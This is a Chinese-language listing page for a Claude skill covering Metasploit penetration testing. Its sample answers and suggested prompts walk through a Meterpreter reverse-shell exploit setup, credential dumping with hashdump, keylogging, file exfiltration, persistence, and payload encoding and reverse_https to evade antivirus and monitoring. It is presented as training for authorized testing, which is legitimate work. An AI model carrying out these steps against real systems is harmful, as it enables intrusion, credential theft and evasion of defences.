metasploit-framework
使用 Claude 掌握 Metasploit 渗透测试
安全专业人员需要专业的指导来进行授权的渗透测试工作流。本技能提供全面的 Metasploit Framework 文档,涵盖漏洞利用、载荷生成和后渗透利用活动,以及法律最佳实践。
下载技能 ZIP
在 Claude 中上传
前往 设置 → 功能 → 技能 → 上传技能
开启并开始使用
测试它
正在使用“metasploit-framework”。 如何启动 msfconsole 并搜索 SMB 漏洞利用模块?
预期结果:
启动 msfconsole 并搜索 SMB 漏洞利用模块:使用 'msfconsole -q' 以安静模式启动控制台,然后使用 'search type:exploit smb' 查找 SMB 相关的漏洞利用模块。你也可以使用 'search eternalblue' 专门搜索 MS17-010 SMB 漏洞利用模块。选择前使用 'info [module_name]' 查看模块详情。
正在使用“metasploit-framework”。 配置和运行带有 meterpreter 载荷的漏洞利用的步骤是什么?
预期结果:
配置漏洞利用分为六个步骤:首先使用 'use [module_path]' 选择漏洞利用模块。运行 'show options' 查看所需设置。使用 'set RHOSTS [target_ip]' 和 'set RPORT [port]' 设置目标参数。使用 'set PAYLOAD windows/x64/meterpreter/reverse_tcp' 选择载荷。使用 'set LHOST [your_ip]' 和 'set LPORT [port]' 配置监听器。最后执行 'exploit' 尝试入侵并建立 Meterpreter 会话。
正在使用“metasploit-framework”。 获得会话后应该使用哪些 Meterpreter 命令?
预期结果:
建立 Meterpreter 会话后,运行 'sysinfo' 和 'getuid' 了解你的访问级别。使用 'hashdump' 提取密码哈希,使用 'ps' 查看运行中的进程。执行 'migrate [PID]' 迁移到更稳定的进程。对于数据外传,使用 'download [file]' 或 'upload [file]'。运行 'screenshot' 捕获桌面或 'keyscan_start' 开始键盘记录。使用 'background' 将会话置于后台以返回 msfconsole。
安全审计
中风险This skill provides documentation for the Metasploit Framework, a legitimate penetration testing tool used by security professionals. All detected patterns are educational examples showing authorized security testing workflows. The skill includes appropriate legal disclaimers emphasizing written authorization requirements. While it documents offensive security capabilities that could be misused, the context clearly indicates professional security assessment purposes with proper legal safeguards.
中风险问题 (1)
低风险问题 (3)
风险因素
⚙️ 外部命令 (4)
🌐 网络访问 (3)
📁 文件系统访问 (1)
质量评分
你能构建什么
渗透测试工作流指导
安全专业人员在授权的渗透测试任务期间使用本技能来导航 Metasploit Framework 功能、选择合适的漏洞利用模块、配置载荷,并在合法范围内开展后渗透利用活动。
安全评估文档
红队成员利用本技能在安全评估报告中记录 Metasploit 使用情况,确保为客户交付成果准确记录正确的命令语法、模块选择和后渗透利用活动。
安全培训教育资源
网络安全学生和认证候选人使用本技能学习 Metasploit Framework 概念,在实验室环境中练习渗透测试工作流,并为 OSCP、CEH 和 PTX 等认证做准备。
试试这些提示
如何搜索并选择适合存在 SMB 漏洞的 Windows 目标的 Metasploit 漏洞利用模块?
指导我配置 eternalblue 漏洞利用模块并搭配 meterpreter reverse_tcp 载荷,包括设置 RHOSTS、LHOST 和所需选项。
建立 Meterpreter 会话后,在授权渗透测试期间我应该使用哪些命令来枚举目标系统、获取凭证并维持持久性?
生成一个 msfvenom 命令来创建具有反向 TCP 连接的 Windows 可执行载荷,包括编码以规避防病毒检测。
最佳实践
- 使用 Metasploit 进行任何渗透测试活动前务必获得书面授权
- 运行漏洞利用前首先使用 'check' 命令验证目标漏洞,以最大限度地减少破坏
- 在部署到生产评估目标之前,在隔离的实验室环境中测试载荷
- 记录所有命令、结果和发现以便纳入渗透测试报告
- 尽可能使用加密的 reverse_https 载荷而不是 reverse_tcp 以规避网络监控
- 立即将会话置于后台并迁移进程以维持访问稳定性
避免
- 未经明确书面授权切勿对系统使用 Metasploit 漏洞利用 - 这是非法的
- 避免在没有适当侦察和漏洞验证的情况下对目标顺序运行所有漏洞利用
- 在文档或培训期间的示例命令中切勿使用生产系统或公共 IP 地址
- 不要让活动的 Meterpreter 会话无人看管,或在评估结束后忘记正确关闭它们
- 避免使用未经编码的载荷,这些载荷容易被防病毒软件检测,应先测试规避技术